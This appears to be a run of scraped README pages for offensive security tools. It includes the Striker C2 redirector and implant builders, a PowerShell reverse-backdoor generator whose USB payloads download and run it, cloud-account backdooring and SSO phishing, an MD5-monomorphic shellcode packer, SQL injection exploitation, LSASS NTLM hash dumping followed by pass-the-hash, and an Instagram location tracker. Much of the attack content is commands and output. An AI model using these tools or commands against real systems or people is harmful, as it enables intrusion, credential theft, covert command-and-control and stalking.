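def pipe(src, dst):
    # Copy bytes one way until the source closes.
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)

def serve(listen_addr, upstream_addr):
    server = socket.socket()
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(listen_addr)
    server.listen(5)
    while True:
        client, _ = server.accept()
        upstream = socket.create_connection(upstream_addr)
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

serve(("0.0.0.0", 443), ("c2.example.org", 443))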

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  2. Create a vhost config (e.g: /etc/nginx/sites-available/striker);

Placeholders;

  • <domain-name> - This is your server's FQDN, and should match the one in your SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be at least as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads of large files will fail.

server {
    listen 443 ssl;
    server_name <domain-name>;
    ssl_certificate <ssl-cert>;
    ssl_certificate_key <ssl-key>;
    client_max_body_size 100M;
    access_log /var/log/nginx/striker.log;

    location / {
        proxy_pass <c2-server>;
        proxy_redirect off;
        proxy_ssl_verify off;
        proxy_read_timeout 90;
        proxy_http_version 1.0;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
  3. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  4. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64-bit host, the following will build for 64-bit;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on a 64-bit host;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>

Where;

  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.

Example;

$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  2. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mkdir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the stub and the builder as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 files in this directory;

  • stub.py - This is the payload stub to pass to the builder.
  • builder.py - This is what you'll be using to generate an implant.

Usage example:

$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!

Support

If you like the project, consider helping me turn coffee into code!



Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is an implementation for our college PCL project, which is still under development and constantly updating.


API Reference

Get all items

  GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
Parameter   Type     Description
username    string   Required. username of the current user
password    string   Required. current user password
target      string   Required. The target Hostname and IP

Get item

  GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
Parameter   Return data   Description             Nmap Command
p1          json          Effective Scan          -Pn -sV -T4 -O -F
p2          json          Simple Scan             -Pn -T4 -A -v
p3          json          Low Power Scan          -Pn -sS -sU -T4 -A -v
p4          json          Partial Intense Scan    -Pn -p- -T4 -A -v
p5          json          Complete Intense Scan   -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln
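A hedged client example for one of these endpoints (the host, port and credentials are placeholders for your own deployment; p2 maps to the "Simple Scan" profile above):

import requests

resp = requests.get("http://127.0.0.1:5000/api/p2/admin:password/scanme.nmap.org")
print(resp.json())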

Auth and User management

  POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
  • make sure you use the ADMIN CREDS MENTIONED BELOW
Parameter        Type     Description
admin-username   String   Admin username
admin-passwd     String   Admin password
id               String   Id for newly added user
username         String   Username of the newly added user
passwd           String   Password of the newly added user
t-username       String   Target username
t-user-id        String   Target userID
t-userpass       String   Target user's password
new-t-username   String   New username for the target
new-t-user-id    String   New userID for the target
new-t-userpass   String   New password for the target

DEFAULT CREDENTIALS

ADMINISTRATOR : zAp6_oO~t428)@,



ThunderCloud - Cloud Exploit Framework


Cloud Exploit Framework


Usage

python3 tc.py -h

[ThunderCloud ASCII-art banner]


usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
[-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

Attack modules of cloud AWS

optional arguments:
-h, --help show this help message and exit
-ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
to verify if cognito endpoint is vulnerable and to extract credentials
-reg REGION, --region REGION
AWS region of the resource
-accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
AWS account of the victim
-aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
AWS access keys of the victim account
-aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
AWS secret key of the victim account
-bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
Name of the backdoor role in victim role
-sso SSO_URL, --sso_url SSO_URL
AWS SSO URL to phish for AWS credentials
-enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
To enumerate and assume account roles in victim AWS roles
-s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
Execute upload attack on S3 bucket
-conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
Azure Shared Access key for readingservicebus/queues/blobs etc
-blob BLOB, --blob BLOB
Azure blob enumeration
-shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
Azure shared key

Requirements

* python 3
* pip
* git

Installation

 - get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`   
- install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
- create a python 3.6 local environment `virtualenv -p python3.6 venv`
- activate the virtual environment `source venv/bin/activate`
- install project dependencies `pip install -r requirements.txt`
- run the tool via `python tc.py --help`

Running ThunderCloud

Examples

python3 tc.py -sso <sso_url> --region <region>
python3 tc.py -ce <cognito_endpoint> --region <region>


IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


IpGeo is a python tool to extract IP addresses from a captured network traffic file (pcap/pcapng) and generate a CSV report containing details about the geolocation of each IP in the packets.


The report contains:

  1. Country
  2. Country Code
  3. Region
  4. Region Name
  5. City
  6. Zip
  7. Latitude
  8. Longitude
  9. Timezone
  10. ISP
  11. Org
  12. IP
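These fields mirror a typical IP-geolocation JSON response. As a hedged illustration, the free ip-api.com service exposes exactly this field set (IpGeo's internals may differ):

import requests

def geolocate(ip):
    # Request only the fields listed in the report above.
    fields = "country,countryCode,region,regionName,city,zip,lat,lon,timezone,isp,org,query"
    return requests.get(f"http://ip-api.com/json/{ip}?fields={fields}").json()

print(geolocate("8.8.8.8"))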

Installation

Use the package manager pip3 to install required modules.

pip3 install colorama
pip3 install requests
pip3 install pyshark

If you are not using Kali, ParrotOS, or any other penetration-testing distribution, you need to install Tshark.

sudo apt install tshark

Usage

python3 ipGeo.py
# then you will enter captured traffic file path


Tracgram - Use Instagram Location Features To Track An Account


Trackgram uses Instagram location features to track an account.

Usage

At this moment the usage of Trackgram is extremely simple:

1. Download this repository

2. Go through the installation steps

3. Change the parameters in the tracgram main method directly:
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your instagram password
- OBJECTIVE: your objective username

+ Optional:
- path_to_csv: the path where the csv file will be stored, including the name


4. Execute it with python3 tracgram.py

Installation steps

  1. Download with $ git clone https://github.com/initzerCreations/Tracgram

  2. Install dependencies using pip install -r requirements.txt

  3. Congrats! By now you should be able to run it: python3 tracgram.py

Screenshots

Features

  1. Provides a heatmap based on the location frequency

  2. Markers displayed on the heatmap indicating:

    • Exact location name
    • Time when the related post was made
    • Link to Google Maps address
  3. Graph relating the post count for a specific location

  4. Generates an easy-to-process .CSV file



Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in Powershell and obfuscated with Python, allowing the backdoor to have a new signature after every run. It can also generate auto-run scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Intresting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up an HTTP server hosting the backdoor. Once the backdoor is retrieved, the HTTP server will be shut down.
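A sketch of that serve-once-then-shut-down behavior (illustrative only; not the tool's actual server code):

import http.server
import threading

class OneShotHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        super().do_GET()  # serve the requested file from the working directory
        if self.path == "/backdoor.ps1":
            # shutdown() blocks if called from the handler thread, so defer it.
            threading.Thread(target=self.server.shutdown, daemon=True).start()

server = http.server.HTTPServer(("0.0.0.0", 8080), OneShotHandler)
server.serve_forever()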

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
โ”Œโ”€โ”€(drewใ‰ฟkali)-[/home/drew/Documents]
โ””โ”€PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Darkdump2 - Search The Deep Web Straight From Your Terminal



About Darkdump (Recent Notice - 12/27/22)

Darkdump is a simple script written in Python 3.11 that allows users to enter a search term (query) on the command line; darkdump will pull all the deep web sites relating to that query. Darkdump 2.0 is here, enjoy!

Installation

  1. git clone https://github.com/josh0xA/darkdump
  2. cd darkdump
  3. python3 -m pip install -r requirements.txt
  4. python3 darkdump.py --help

Usage

Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12

  • Note: The 'amount' argument filters the number of results outputted

Usage With Increased Anonymity

Darkdump Proxy: python3 darkdump.py --query bitcoin -p

Menu


[Darkdump ASCII-art banner]

Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0

usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]

options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity

Visual

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.

License

MIT License
Copyright (c) Josh Schiavone



Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•
โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•โ•”โ•โ•— โ• โ•โ•—
โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ• โ•โ•โ•โ•ฉ โ•ฉโ•
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ•
By Retr0id

โ•โ•โ• MD5-Monomorphic Shellcode Packer โ• โ•โ•


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.
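Conceptually, decoding is just checking which of the two precomputed 64-byte variants sits at each collision slot. A simplified sketch of that step (hypothetical helper, not Monomorph's code):

def decode_bits(file_bytes, block_offsets, variant_a_blocks):
    # MD5 processes 64-byte blocks; each payload bit is represented by one of
    # two colliding blocks, so equality against the "A" variant recovers the bit.
    bits = []
    for offset, block_a in zip(block_offsets, variant_a_blocks):
        block = file_bytes[offset:offset + 64]
        bits.append(0 if block == block_a else 1)
    return bits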

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.
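
To make the block-swap encoding concrete, here is a minimal Python sketch of the idea (this is not Monomorph's actual code; collisions stands in for the pre-computed list of FastColl block pairs):

# Each pair (block_a, block_b) collides under MD5 in context, so swapping
# one for the other leaves the file's overall MD5 unchanged.
def encode(collisions, payload: bytes) -> bytes:
    out = bytearray()
    for i, (block_a, block_b) in enumerate(collisions):
        bit = (payload[i // 8] >> (i % 8)) & 1   # i-th payload bit, LSB first
        out += block_b if bit else block_a       # pick the block encoding it
    return bytes(out)

def decode(blob: bytes, collisions, block_len: int = 128) -> list:
    # The loader's view: recover each bit by checking which block is present.
    return [
        0 if blob[i * block_len:(i + 1) * block_len] == block_a else 1
        for i, (block_a, _block_b) in enumerate(collisions)
    ]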

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to the ghauri directory.
  • install the requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will then be able to run ghauri with a simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports the following types of injection payloads:
    • Boolean-based
    • Error-based
    • Time-based
    • Stacked queries
  • Supports SQL injection for the following DBMSes:
    • MySQL
    • Microsoft SQL Server
    • PostgreSQL
    • Oracle
  • Supports the following injection types:
    • GET/POST based injections
    • Header based injections
    • Cookie based injections
    • Multipart form data injections
    • JSON based injections
  • Supports the proxy option --proxy.
  • Supports parsing a request from a txt file: switch for that is -r file.txt
  • Supports limiting data extraction for dbs/tables/columns/dump: switch --start 1 --stop 2
  • Added support for resuming all phases.
  • Added support for the skip-urlencoding switch: --skip-urlencode
  • Added support to verify extracted characters in case of boolean/time-based injections (an illustrative invocation combining several of these switches follows).
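
For example, the switches above can be combined as follows (the request file and target URL are illustrative):

ghauri -r request.txt --dbms MySQL --batch --current-db
ghauri -u "http://www.site.com/vuln.php?id=1" --dbs --start 1 --stop 2 --skip-urlencode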

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1').
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value
-H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrieve entries from offset for dbs/tables/columns/dump
--stop Retrieve entries till offset for dbs/tables/columns/dump

Example:
ghauri -u http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
The developer assumes no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union-based queries.


DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables the remote registry to modify the AutodialDLL entry and start/restart the BITS service. svchost would load our DLL, set AutodialDLL back to its default value and perform an RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it will search inside the process memory to extract NTLM hashes and the key/IV.

The DllMain always returns FALSE so the processes don't keep it loaded.
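
For reference, here is a minimal local sketch (not DragonCastle's code) of inspecting and restoring the registry value the tool modifies remotely; the key path and the rasadhlp.dll default are as described in public AutodialDLL hijacking write-ups:

import winreg

KEY = r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
DEFAULT = r"C:\Windows\System32\rasadhlp.dll"  # documented default value

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY, 0,
                    winreg.KEY_READ | winreg.KEY_SET_VALUE) as key:
    current, _type = winreg.QueryValueEx(key, "AutodialDLL")
    print(f"AutodialDLL currently points to: {current}")
    if current.lower() != DEFAULT.lower():
        # Restore the default if the value was left pointing elsewhere
        winreg.SetValueEx(key, "AutodialDLL", 0, winreg.REG_SZ, DEFAULT)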


Caveats

It only works when RunAsPPL is not enabled. Also, I only added support for decrypting 3DES because I am lazy, but it should be easy peasy to add code for AES. For the same reason, I only implemented support for the following Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid domain name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|โ‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|โ‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
